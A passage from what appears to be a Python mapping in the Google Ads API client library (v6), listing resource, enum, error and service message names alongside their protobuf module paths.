"google.ads.google_ads.v6.proto.resources.customer_label_pb2", "CustomerLabelOperation": "google.ads.google_ads.v6.proto.services.customer_label_service_pb2", "CustomerManagerLink": "google.ads.google_ads.v6.proto.resources.customer_manager_link_pb2", "CustomerManagerLinkErrorEnum": "google.ads.google_ads.v6.proto.errors.customer_manager_link_error_pb2", "CustomerManagerLinkOperation": "google.ads.google_ads.v6.proto.services.customer_manager_link_service_pb2", "CustomerMatchUploadKeyTypeEnum": "google.ads.google_ads.v6.proto.enums.customer_match_upload_key_type_pb2", "CustomerMatchUserListMetadata": "google.ads.google_ads.v6.proto.common.offline_user_data_pb2", "CustomerNegativeCriterion": "google.ads.google_ads.v6.proto.resources.customer_negative_criterion_pb2", "CustomerNegativeCriterionOperation": "google.ads.google_ads.v6.proto.services.customer_negative_criterion_service_pb2", "CustomerOperation": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "CustomerPayPerConversionEligibilityFailureReasonEnum": "google.ads.google_ads.v6.proto.enums.customer_pay_per_conversion_eligibility_failure_reason_pb2", "CustomerUserAccess": "google.ads.google_ads.v6.proto.resources.customer_user_access_pb2", "CustomerUserAccessErrorEnum": "google.ads.google_ads.v6.proto.errors.customer_user_access_error_pb2", "CustomerUserAccessInvitation": "google.ads.google_ads.v6.proto.resources.customer_user_access_invitation_pb2", "CustomerUserAccessInvitationOperation": "google.ads.google_ads.v6.proto.services.customer_user_access_invitation_service_pb2", "CustomerUserAccessOperation": "google.ads.google_ads.v6.proto.services.customer_user_access_service_pb2", "DataDrivenModelStatusEnum": "google.ads.google_ads.v6.proto.enums.data_driven_model_status_pb2", "DataPartnerLinkIdentifier": "google.ads.google_ads.v6.proto.resources.account_link_pb2", "DatabaseErrorEnum": "google.ads.google_ads.v6.proto.errors.database_error_pb2", "DateErrorEnum": "google.ads.google_ads.v6.proto.errors.date_error_pb2", "DateRange": "google.ads.google_ads.v6.proto.common.dates_pb2", "DateRangeErrorEnum": "google.ads.google_ads.v6.proto.errors.date_range_error_pb2", "DateSpecificRuleUserListInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "DayOfWeekEnum": "google.ads.google_ads.v6.proto.enums.day_of_week_pb2", "DetailPlacementView": "google.ads.google_ads.v6.proto.resources.detail_placement_view_pb2", "DeviceEnum": "google.ads.google_ads.v6.proto.enums.device_pb2", "DeviceInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "DismissRecommendationRequest": "google.ads.google_ads.v6.proto.services.recommendation_service_pb2", "DismissRecommendationResponse": "google.ads.google_ads.v6.proto.services.recommendation_service_pb2", "DisplayAdFormatSettingEnum": "google.ads.google_ads.v6.proto.enums.display_ad_format_setting_pb2", "DisplayCallToAction": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "DisplayKeywordView": "google.ads.google_ads.v6.proto.resources.display_keyword_view_pb2", "DisplayUploadAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "DisplayUploadProductTypeEnum": "google.ads.google_ads.v6.proto.enums.display_upload_product_type_pb2", "DistanceBucketEnum": "google.ads.google_ads.v6.proto.enums.distance_bucket_pb2", "DistanceView": "google.ads.google_ads.v6.proto.resources.distance_view_pb2", "DistinctErrorEnum": "google.ads.google_ads.v6.proto.errors.distinct_error_pb2", "DomainCategory": "google.ads.google_ads.v6.proto.resources.domain_category_pb2", "DsaPageFeedCriterionFieldEnum": "google.ads.google_ads.v6.proto.enums.dsa_page_feed_criterion_field_pb2", "DynamicAffiliateLocationSetFilter": "google.ads.google_ads.v6.proto.common.feed_item_set_filter_type_infos_pb2", "DynamicLocationSetFilter": "google.ads.google_ads.v6.proto.common.feed_item_set_filter_type_infos_pb2", "DynamicSearchAdsSearchTermView": "google.ads.google_ads.v6.proto.resources.dynamic_search_ads_search_term_view_pb2", "EducationPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.education_placeholder_field_pb2", "EndCampaignExperimentRequest": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "EnhancedCpc": "google.ads.google_ads.v6.proto.common.bidding_pb2", "EnumErrorEnum": "google.ads.google_ads.v6.proto.errors.enum_error_pb2", "ErrorCode": "google.ads.google_ads.v6.proto.errors.errors_pb2", "ErrorDetails": "google.ads.google_ads.v6.proto.errors.errors_pb2", "ErrorLocation": "google.ads.google_ads.v6.proto.errors.errors_pb2", "ExpandedDynamicSearchAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "ExpandedLandingPageView": "google.ads.google_ads.v6.proto.resources.expanded_landing_page_view_pb2", "ExpandedTextAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "ExplorerAutoOptimizerSetting": "google.ads.google_ads.v6.proto.common.explorer_auto_optimizer_setting_pb2", "ExpressionRuleUserListInfo": "google.ads.google_ads.v6.proto.common.user_lists_pb2", "ExtensionFeedItem": "google.ads.google_ads.v6.proto.resources.extension_feed_item_pb2", "ExtensionFeedItemErrorEnum": "google.ads.google_ads.v6.proto.errors.extension_feed_item_error_pb2", "ExtensionFeedItemOperation": "google.ads.google_ads.v6.proto.services.extension_feed_item_service_pb2", "ExtensionSettingDeviceEnum": "google.ads.google_ads.v6.proto.enums.extension_setting_device_pb2", "ExtensionSettingErrorEnum": "google.ads.google_ads.v6.proto.errors.extension_setting_error_pb2", "ExtensionTypeEnum": "google.ads.google_ads.v6.proto.enums.extension_type_pb2", "ExternalAttributionData": "google.ads.google_ads.v6.proto.services.conversion_upload_service_pb2", "ExternalConversionSourceEnum": "google.ads.google_ads.v6.proto.enums.external_conversion_source_pb2", "Feed": "google.ads.google_ads.v6.proto.resources.feed_pb2", "FeedAttribute": "google.ads.google_ads.v6.proto.resources.feed_pb2", "FeedAttributeOperation": "google.ads.google_ads.v6.proto.resources.feed_pb2", "FeedAttributeReferenceErrorEnum": "google.ads.google_ads.v6.proto.errors.feed_attribute_reference_error_pb2", "FeedAttributeTypeEnum": "google.ads.google_ads.v6.proto.enums.feed_attribute_type_pb2", "FeedErrorEnum": "google.ads.google_ads.v6.proto.errors.feed_error_pb2", "FeedItem": "google.ads.google_ads.v6.proto.resources.feed_item_pb2", "FeedItemAttributeValue": "google.ads.google_ads.v6.proto.resources.feed_item_pb2", "FeedItemErrorEnum": "google.ads.google_ads.v6.proto.errors.feed_item_error_pb2", "FeedItemOperation": "google.ads.google_ads.v6.proto.services.feed_item_service_pb2", "FeedItemPlaceholderPolicyInfo": "google.ads.google_ads.v6.proto.resources.feed_item_pb2", "FeedItemQualityApprovalStatusEnum": "google.ads.google_ads.v6.proto.enums.feed_item_quality_approval_status_pb2", "FeedItemQualityDisapprovalReasonEnum": "google.ads.google_ads.v6.proto.enums.feed_item_quality_disapproval_reason_pb2", "FeedItemSet": "google.ads.google_ads.v6.proto.resources.feed_item_set_pb2", "FeedItemSetErrorEnum": "google.ads.google_ads.v6.proto.errors.feed_item_set_error_pb2", "FeedItemSetLink": "google.ads.google_ads.v6.proto.resources.feed_item_set_link_pb2", "FeedItemSetLinkErrorEnum": "google.ads.google_ads.v6.proto.errors.feed_item_set_link_error_pb2", "FeedItemSetLinkOperation": "google.ads.google_ads.v6.proto.services.feed_item_set_link_service_pb2", "FeedItemSetOperation": "google.ads.google_ads.v6.proto.services.feed_item_set_service_pb2", "FeedItemSetStatusEnum": "google.ads.google_ads.v6.proto.enums.feed_item_set_status_pb2", "FeedItemSetStringFilterTypeEnum": "google.ads.google_ads.v6.proto.enums.feed_item_set_string_filter_type_pb2", "FeedItemStatusEnum": "google.ads.google_ads.v6.proto.enums.feed_item_status_pb2", "FeedItemTarget": "google.ads.google_ads.v6.proto.resources.feed_item_target_pb2", "FeedItemTargetDeviceEnum": "google.ads.google_ads.v6.proto.enums.feed_item_target_device_pb2", "FeedItemTargetErrorEnum": "google.ads.google_ads.v6.proto.errors.feed_item_target_error_pb2", "FeedItemTargetOperation": "google.ads.google_ads.v6.proto.services.feed_item_target_service_pb2", "FeedItemTargetStatusEnum": "google.ads.google_ads.v6.proto.enums.feed_item_target_status_pb2", "FeedItemTargetTypeEnum": "google.ads.google_ads.v6.proto.enums.feed_item_target_type_pb2", "FeedItemValidationError": "google.ads.google_ads.v6.proto.resources.feed_item_pb2", "FeedItemValidationErrorEnum": "google.ads.google_ads.v6.proto.errors.feed_item_validation_error_pb2", "FeedItemValidationStatusEnum": "google.ads.google_ads.v6.proto.enums.feed_item_validation_status_pb2", "FeedLinkStatusEnum": "google.ads.google_ads.v6.proto.enums.feed_link_status_pb2", "FeedMapping": "google.ads.google_ads.v6.proto.resources.feed_mapping_pb2", "FeedMappingCriterionTypeEnum": "google.ads.google_ads.v6.proto.enums.feed_mapping_criterion_type_pb2", "FeedMappingErrorEnum": "google.ads.google_ads.v6.proto.errors.feed_mapping_error_pb2", "FeedMappingOperation": "google.ads.google_ads.v6.proto.services.feed_mapping_service_pb2", "FeedMappingStatusEnum": "google.ads.google_ads.v6.proto.enums.feed_mapping_status_pb2", "FeedOperation": "google.ads.google_ads.v6.proto.services.feed_service_pb2", "FeedOriginEnum": "google.ads.google_ads.v6.proto.enums.feed_origin_pb2", "FeedPlaceholderView": "google.ads.google_ads.v6.proto.resources.feed_placeholder_view_pb2", "FeedStatusEnum": "google.ads.google_ads.v6.proto.enums.feed_status_pb2", "FieldErrorEnum": "google.ads.google_ads.v6.proto.errors.field_error_pb2", "FieldMaskErrorEnum": "google.ads.google_ads.v6.proto.errors.field_mask_error_pb2", "FinalAppUrl": "google.ads.google_ads.v6.proto.common.final_app_url_pb2", "FlightPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.flight_placeholder_field_pb2", "Forecast": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "ForecastMetrics": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "FrequencyCap": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "FrequencyCapEntry": "google.ads.google_ads.v6.proto.common.frequency_cap_pb2", "FrequencyCapEventTypeEnum": "google.ads.google_ads.v6.proto.enums.frequency_cap_event_type_pb2", "FrequencyCapKey": "google.ads.google_ads.v6.proto.common.frequency_cap_pb2", "FrequencyCapLevelEnum": "google.ads.google_ads.v6.proto.enums.frequency_cap_level_pb2", "FrequencyCapTimeUnitEnum": "google.ads.google_ads.v6.proto.enums.frequency_cap_time_unit_pb2", "FunctionErrorEnum": "google.ads.google_ads.v6.proto.errors.function_error_pb2", "FunctionParsingErrorEnum": "google.ads.google_ads.v6.proto.errors.function_parsing_error_pb2", "GclidDateTimePair": "google.ads.google_ads.v6.proto.services.conversion_adjustment_upload_service_pb2", "GenderInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "GenderTypeEnum": "google.ads.google_ads.v6.proto.enums.gender_type_pb2", "GenderView": "google.ads.google_ads.v6.proto.resources.gender_view_pb2", "GenerateForecastCurveRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GenerateForecastCurveResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GenerateForecastMetricsRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GenerateForecastMetricsResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GenerateForecastTimeSeriesRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GenerateForecastTimeSeriesResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GenerateHistoricalMetricsRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GenerateHistoricalMetricsResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GenerateKeywordIdeaResponse": "google.ads.google_ads.v6.proto.services.keyword_plan_idea_service_pb2", "GenerateKeywordIdeaResult": "google.ads.google_ads.v6.proto.services.keyword_plan_idea_service_pb2", "GenerateKeywordIdeasRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_idea_service_pb2", "GenerateProductMixIdeasRequest": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "GenerateProductMixIdeasResponse": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "GenerateReachForecastRequest": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "GenerateReachForecastResponse": "google.ads.google_ads.v6.proto.services.reach_plan_service_pb2", "GeoPointInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "GeoTargetConstant": "google.ads.google_ads.v6.proto.resources.geo_target_constant_pb2", "GeoTargetConstantStatusEnum": "google.ads.google_ads.v6.proto.enums.geo_target_constant_status_pb2", "GeoTargetConstantSuggestion": "google.ads.google_ads.v6.proto.services.geo_target_constant_service_pb2", "GeoTargetConstantSuggestionErrorEnum": "google.ads.google_ads.v6.proto.errors.geo_target_constant_suggestion_error_pb2", "GeoTargetingRestrictionEnum": "google.ads.google_ads.v6.proto.enums.geo_targeting_restriction_pb2", "GeoTargetingTypeEnum": "google.ads.google_ads.v6.proto.enums.geo_targeting_type_pb2", "GeographicView": "google.ads.google_ads.v6.proto.resources.geographic_view_pb2", "GetAccountBudgetProposalRequest": "google.ads.google_ads.v6.proto.services.account_budget_proposal_service_pb2", "GetAccountBudgetRequest": "google.ads.google_ads.v6.proto.services.account_budget_service_pb2", "GetAccountLinkRequest": "google.ads.google_ads.v6.proto.services.account_link_service_pb2", "GetAdGroupAdAssetViewRequest": "google.ads.google_ads.v6.proto.services.ad_group_ad_asset_view_service_pb2", "GetAdGroupAdLabelRequest": "google.ads.google_ads.v6.proto.services.ad_group_ad_label_service_pb2", "GetAdGroupAdRequest": "google.ads.google_ads.v6.proto.services.ad_group_ad_service_pb2", "GetAdGroupAudienceViewRequest": "google.ads.google_ads.v6.proto.services.ad_group_audience_view_service_pb2", "GetAdGroupBidModifierRequest": "google.ads.google_ads.v6.proto.services.ad_group_bid_modifier_service_pb2", "GetAdGroupCriterionLabelRequest": "google.ads.google_ads.v6.proto.services.ad_group_criterion_label_service_pb2", "GetAdGroupCriterionRequest": "google.ads.google_ads.v6.proto.services.ad_group_criterion_service_pb2", "GetAdGroupCriterionSimulationRequest": "google.ads.google_ads.v6.proto.services.ad_group_criterion_simulation_service_pb2", "GetAdGroupExtensionSettingRequest": "google.ads.google_ads.v6.proto.services.ad_group_extension_setting_service_pb2", "GetAdGroupFeedRequest": "google.ads.google_ads.v6.proto.services.ad_group_feed_service_pb2", "GetAdGroupLabelRequest": "google.ads.google_ads.v6.proto.services.ad_group_label_service_pb2", "GetAdGroupRequest": "google.ads.google_ads.v6.proto.services.ad_group_service_pb2", "GetAdGroupSimulationRequest": "google.ads.google_ads.v6.proto.services.ad_group_simulation_service_pb2", "GetAdParameterRequest": "google.ads.google_ads.v6.proto.services.ad_parameter_service_pb2", "GetAdRequest": "google.ads.google_ads.v6.proto.services.ad_service_pb2", "GetAdScheduleViewRequest": "google.ads.google_ads.v6.proto.services.ad_schedule_view_service_pb2", "GetAgeRangeViewRequest": "google.ads.google_ads.v6.proto.services.age_range_view_service_pb2", "GetAssetRequest": "google.ads.google_ads.v6.proto.services.asset_service_pb2", "GetBatchJobRequest": "google.ads.google_ads.v6.proto.services.batch_job_service_pb2", "GetBiddingStrategyRequest": "google.ads.google_ads.v6.proto.services.bidding_strategy_service_pb2", "GetBillingSetupRequest": "google.ads.google_ads.v6.proto.services.billing_setup_service_pb2", "GetCampaignAssetRequest": "google.ads.google_ads.v6.proto.services.campaign_asset_service_pb2", "GetCampaignAudienceViewRequest": "google.ads.google_ads.v6.proto.services.campaign_audience_view_service_pb2", "GetCampaignBidModifierRequest": "google.ads.google_ads.v6.proto.services.campaign_bid_modifier_service_pb2", "GetCampaignBudgetRequest": "google.ads.google_ads.v6.proto.services.campaign_budget_service_pb2", "GetCampaignCriterionRequest": "google.ads.google_ads.v6.proto.services.campaign_criterion_service_pb2", "GetCampaignCriterionSimulationRequest": "google.ads.google_ads.v6.proto.services.campaign_criterion_simulation_service_pb2", "GetCampaignDraftRequest": "google.ads.google_ads.v6.proto.services.campaign_draft_service_pb2", "GetCampaignExperimentRequest": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "GetCampaignExtensionSettingRequest": "google.ads.google_ads.v6.proto.services.campaign_extension_setting_service_pb2", "GetCampaignFeedRequest": "google.ads.google_ads.v6.proto.services.campaign_feed_service_pb2", "GetCampaignLabelRequest": "google.ads.google_ads.v6.proto.services.campaign_label_service_pb2", "GetCampaignRequest": "google.ads.google_ads.v6.proto.services.campaign_service_pb2", "GetCampaignSharedSetRequest": "google.ads.google_ads.v6.proto.services.campaign_shared_set_service_pb2", "GetCarrierConstantRequest": "google.ads.google_ads.v6.proto.services.carrier_constant_service_pb2", "GetChangeStatusRequest": "google.ads.google_ads.v6.proto.services.change_status_service_pb2", "GetClickViewRequest": "google.ads.google_ads.v6.proto.services.click_view_service_pb2", "GetCombinedAudienceRequest": "google.ads.google_ads.v6.proto.services.combined_audience_service_pb2", "GetConversionActionRequest": "google.ads.google_ads.v6.proto.services.conversion_action_service_pb2", "GetCurrencyConstantRequest": "google.ads.google_ads.v6.proto.services.currency_constant_service_pb2", "GetCustomAudienceRequest": "google.ads.google_ads.v6.proto.services.custom_audience_service_pb2", "GetCustomInterestRequest": "google.ads.google_ads.v6.proto.services.custom_interest_service_pb2", "GetCustomerClientLinkRequest": "google.ads.google_ads.v6.proto.services.customer_client_link_service_pb2", "GetCustomerClientRequest": "google.ads.google_ads.v6.proto.services.customer_client_service_pb2", "GetCustomerExtensionSettingRequest": "google.ads.google_ads.v6.proto.services.customer_extension_setting_service_pb2", "GetCustomerFeedRequest": "google.ads.google_ads.v6.proto.services.customer_feed_service_pb2", "GetCustomerLabelRequest": "google.ads.google_ads.v6.proto.services.customer_label_service_pb2", "GetCustomerManagerLinkRequest": "google.ads.google_ads.v6.proto.services.customer_manager_link_service_pb2", "GetCustomerNegativeCriterionRequest": "google.ads.google_ads.v6.proto.services.customer_negative_criterion_service_pb2", "GetCustomerRequest": "google.ads.google_ads.v6.proto.services.customer_service_pb2", "GetCustomerUserAccessInvitationRequest": "google.ads.google_ads.v6.proto.services.customer_user_access_invitation_service_pb2", "GetCustomerUserAccessRequest": "google.ads.google_ads.v6.proto.services.customer_user_access_service_pb2", "GetDetailPlacementViewRequest": "google.ads.google_ads.v6.proto.services.detail_placement_view_service_pb2", "GetDisplayKeywordViewRequest": "google.ads.google_ads.v6.proto.services.display_keyword_view_service_pb2", "GetDistanceViewRequest": "google.ads.google_ads.v6.proto.services.distance_view_service_pb2", "GetDomainCategoryRequest": "google.ads.google_ads.v6.proto.services.domain_category_service_pb2", "GetDynamicSearchAdsSearchTermViewRequest": "google.ads.google_ads.v6.proto.services.dynamic_search_ads_search_term_view_service_pb2", "GetExpandedLandingPageViewRequest": "google.ads.google_ads.v6.proto.services.expanded_landing_page_view_service_pb2", "GetExtensionFeedItemRequest": "google.ads.google_ads.v6.proto.services.extension_feed_item_service_pb2", "GetFeedItemRequest": "google.ads.google_ads.v6.proto.services.feed_item_service_pb2", "GetFeedItemSetLinkRequest": "google.ads.google_ads.v6.proto.services.feed_item_set_link_service_pb2", "GetFeedItemSetRequest": "google.ads.google_ads.v6.proto.services.feed_item_set_service_pb2", "GetFeedItemTargetRequest": "google.ads.google_ads.v6.proto.services.feed_item_target_service_pb2", "GetFeedMappingRequest": "google.ads.google_ads.v6.proto.services.feed_mapping_service_pb2", "GetFeedPlaceholderViewRequest": "google.ads.google_ads.v6.proto.services.feed_placeholder_view_service_pb2", "GetFeedRequest": "google.ads.google_ads.v6.proto.services.feed_service_pb2", "GetGenderViewRequest": "google.ads.google_ads.v6.proto.services.gender_view_service_pb2", "GetGeoTargetConstantRequest": "google.ads.google_ads.v6.proto.services.geo_target_constant_service_pb2", "GetGeographicViewRequest": "google.ads.google_ads.v6.proto.services.geographic_view_service_pb2", "GetGoogleAdsFieldRequest": "google.ads.google_ads.v6.proto.services.google_ads_field_service_pb2", "GetGroupPlacementViewRequest": "google.ads.google_ads.v6.proto.services.group_placement_view_service_pb2", "GetHotelGroupViewRequest": "google.ads.google_ads.v6.proto.services.hotel_group_view_service_pb2", "GetHotelPerformanceViewRequest": "google.ads.google_ads.v6.proto.services.hotel_performance_view_service_pb2", "GetIncomeRangeViewRequest": "google.ads.google_ads.v6.proto.services.income_range_view_service_pb2", "GetKeywordPlanAdGroupKeywordRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_keyword_service_pb2", "GetKeywordPlanAdGroupRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_service_pb2", "GetKeywordPlanCampaignKeywordRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_keyword_service_pb2", "GetKeywordPlanCampaignRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_service_pb2", "GetKeywordPlanRequest": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "GetKeywordViewRequest": "google.ads.google_ads.v6.proto.services.keyword_view_service_pb2", "GetLabelRequest": "google.ads.google_ads.v6.proto.services.label_service_pb2", "GetLandingPageViewRequest": "google.ads.google_ads.v6.proto.services.landing_page_view_service_pb2", "GetLanguageConstantRequest": "google.ads.google_ads.v6.proto.services.language_constant_service_pb2", "GetLocationViewRequest": "google.ads.google_ads.v6.proto.services.location_view_service_pb2", "GetManagedPlacementViewRequest": "google.ads.google_ads.v6.proto.services.managed_placement_view_service_pb2", "GetMediaFileRequest": "google.ads.google_ads.v6.proto.services.media_file_service_pb2", "GetMerchantCenterLinkRequest": "google.ads.google_ads.v6.proto.services.merchant_center_link_service_pb2", "GetMobileAppCategoryConstantRequest": "google.ads.google_ads.v6.proto.services.mobile_app_category_constant_service_pb2", "GetMobileDeviceConstantRequest": "google.ads.google_ads.v6.proto.services.mobile_device_constant_service_pb2", "GetOfflineUserDataJobRequest": "google.ads.google_ads.v6.proto.services.offline_user_data_job_service_pb2", "GetOperatingSystemVersionConstantRequest": "google.ads.google_ads.v6.proto.services.operating_system_version_constant_service_pb2", "GetPaidOrganicSearchTermViewRequest": "google.ads.google_ads.v6.proto.services.paid_organic_search_term_view_service_pb2", "GetParentalStatusViewRequest": "google.ads.google_ads.v6.proto.services.parental_status_view_service_pb2", "GetProductBiddingCategoryConstantRequest": "google.ads.google_ads.v6.proto.services.product_bidding_category_constant_service_pb2", "GetProductGroupViewRequest": "google.ads.google_ads.v6.proto.services.product_group_view_service_pb2", "GetRecommendationRequest": "google.ads.google_ads.v6.proto.services.recommendation_service_pb2", "GetRemarketingActionRequest": "google.ads.google_ads.v6.proto.services.remarketing_action_service_pb2", "GetSearchTermViewRequest": "google.ads.google_ads.v6.proto.services.search_term_view_service_pb2", "GetSharedCriterionRequest": "google.ads.google_ads.v6.proto.services.shared_criterion_service_pb2", "GetSharedSetRequest": "google.ads.google_ads.v6.proto.services.shared_set_service_pb2", "GetShoppingPerformanceViewRequest": "google.ads.google_ads.v6.proto.services.shopping_performance_view_service_pb2", "GetThirdPartyAppAnalyticsLinkRequest": "google.ads.google_ads.v6.proto.services.third_party_app_analytics_link_service_pb2", "GetTopicConstantRequest": "google.ads.google_ads.v6.proto.services.topic_constant_service_pb2", "GetTopicViewRequest": "google.ads.google_ads.v6.proto.services.topic_view_service_pb2", "GetUserInterestRequest": "google.ads.google_ads.v6.proto.services.user_interest_service_pb2", "GetUserListRequest": "google.ads.google_ads.v6.proto.services.user_list_service_pb2", "GetUserLocationViewRequest": "google.ads.google_ads.v6.proto.services.user_location_view_service_pb2", "GetVideoRequest": "google.ads.google_ads.v6.proto.services.video_service_pb2", "GmailAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "GmailTeaser": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "GoogleAdsError": "google.ads.google_ads.v6.proto.errors.errors_pb2", "GoogleAdsFailure": "google.ads.google_ads.v6.proto.errors.errors_pb2", "GoogleAdsField": "google.ads.google_ads.v6.proto.resources.google_ads_field_pb2", "GoogleAdsFieldCategoryEnum": "google.ads.google_ads.v6.proto.enums.google_ads_field_category_pb2", "GoogleAdsFieldDataTypeEnum": "google.ads.google_ads.v6.proto.enums.google_ads_field_data_type_pb2", "GoogleAdsLinkIdentifier": "google.ads.google_ads.v6.proto.resources.account_link_pb2", "GoogleAdsRow": "google.ads.google_ads.v6.proto.services.google_ads_service_pb2", "GoogleVoiceCallStatusEnum": "google.ads.google_ads.v6.proto.enums.google_voice_call_status_pb2", "GraduateCampaignExperimentRequest": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "GraduateCampaignExperimentResponse": "google.ads.google_ads.v6.proto.services.campaign_experiment_service_pb2", "GroupPlacementView": "google.ads.google_ads.v6.proto.resources.group_placement_view_pb2", "HeaderErrorEnum": "google.ads.google_ads.v6.proto.errors.header_error_pb2", "HotelAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "HotelAdvanceBookingWindowInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "HotelCalloutFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "HotelCheckInDayInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "HotelCityInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "HotelClassInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "HotelCountryRegionInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "HotelDateSelectionTypeEnum": "google.ads.google_ads.v6.proto.enums.hotel_date_selection_type_pb2", "HotelDateSelectionTypeInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "HotelGroupView": "google.ads.google_ads.v6.proto.resources.hotel_group_view_pb2", "HotelIdInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "HotelLengthOfStayInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "HotelPerformanceView": "google.ads.google_ads.v6.proto.resources.hotel_performance_view_pb2", "HotelPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.hotel_placeholder_field_pb2", "HotelPriceBucketEnum": "google.ads.google_ads.v6.proto.enums.hotel_price_bucket_pb2", "HotelRateTypeEnum": "google.ads.google_ads.v6.proto.enums.hotel_rate_type_pb2", "HotelStateInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "IdErrorEnum": "google.ads.google_ads.v6.proto.errors.id_error_pb2", "ImageAdInfo": "google.ads.google_ads.v6.proto.common.ad_type_infos_pb2", "ImageAsset": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "ImageDimension": "google.ads.google_ads.v6.proto.common.asset_types_pb2", "ImageErrorEnum": "google.ads.google_ads.v6.proto.errors.image_error_pb2", "ImageFeedItem": "google.ads.google_ads.v6.proto.common.extensions_pb2", "ImagePlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.image_placeholder_field_pb2", "IncomeRangeInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "IncomeRangeTypeEnum": "google.ads.google_ads.v6.proto.enums.income_range_type_pb2", "IncomeRangeView": "google.ads.google_ads.v6.proto.resources.income_range_view_pb2", "InteractionEventTypeEnum": "google.ads.google_ads.v6.proto.enums.interaction_event_type_pb2", "InteractionTypeEnum": "google.ads.google_ads.v6.proto.enums.interaction_type_pb2", "InteractionTypeInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "InternalErrorEnum": "google.ads.google_ads.v6.proto.errors.internal_error_pb2", "Invoice": "google.ads.google_ads.v6.proto.resources.invoice_pb2", "InvoiceErrorEnum": "google.ads.google_ads.v6.proto.errors.invoice_error_pb2", "InvoiceTypeEnum": "google.ads.google_ads.v6.proto.enums.invoice_type_pb2", "IpBlockInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "JobPlaceholderFieldEnum": "google.ads.google_ads.v6.proto.enums.job_placeholder_field_pb2", "Keyword": "google.ads.google_ads.v6.proto.common.segments_pb2", "KeywordAndUrlSeed": "google.ads.google_ads.v6.proto.services.keyword_plan_idea_service_pb2", "KeywordInfo": "google.ads.google_ads.v6.proto.common.criteria_pb2", "KeywordMatchTypeEnum": "google.ads.google_ads.v6.proto.enums.keyword_match_type_pb2", "KeywordPlan": "google.ads.google_ads.v6.proto.resources.keyword_plan_pb2", "KeywordPlanAdGroup": "google.ads.google_ads.v6.proto.resources.keyword_plan_ad_group_pb2", "KeywordPlanAdGroupErrorEnum": "google.ads.google_ads.v6.proto.errors.keyword_plan_ad_group_error_pb2", "KeywordPlanAdGroupForecast": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanAdGroupKeyword": "google.ads.google_ads.v6.proto.resources.keyword_plan_ad_group_keyword_pb2", "KeywordPlanAdGroupKeywordErrorEnum": "google.ads.google_ads.v6.proto.errors.keyword_plan_ad_group_keyword_error_pb2", "KeywordPlanAdGroupKeywordOperation": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_keyword_service_pb2", "KeywordPlanAdGroupOperation": "google.ads.google_ads.v6.proto.services.keyword_plan_ad_group_service_pb2", "KeywordPlanCampaign": "google.ads.google_ads.v6.proto.resources.keyword_plan_campaign_pb2", "KeywordPlanCampaignErrorEnum": "google.ads.google_ads.v6.proto.errors.keyword_plan_campaign_error_pb2", "KeywordPlanCampaignForecast": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanCampaignForecastCurve": "google.ads.google_ads.v6.proto.services.keyword_plan_service_pb2", "KeywordPlanCampaignKeyword": "google.ads.google_ads.v6.proto.resources.keyword_plan_campaign_keyword_pb2", "KeywordPlanCampaignKeywordErrorEnum": "google.ads.google_ads.v6.proto.errors.keyword_plan_campaign_keyword_error_pb2", "KeywordPlanCampaignKeywordOperation": "google.ads.google_ads.v6.proto.services.keyword_plan_campaign_keyword_service_pb2", "KeywordPlanCampaignOperation": 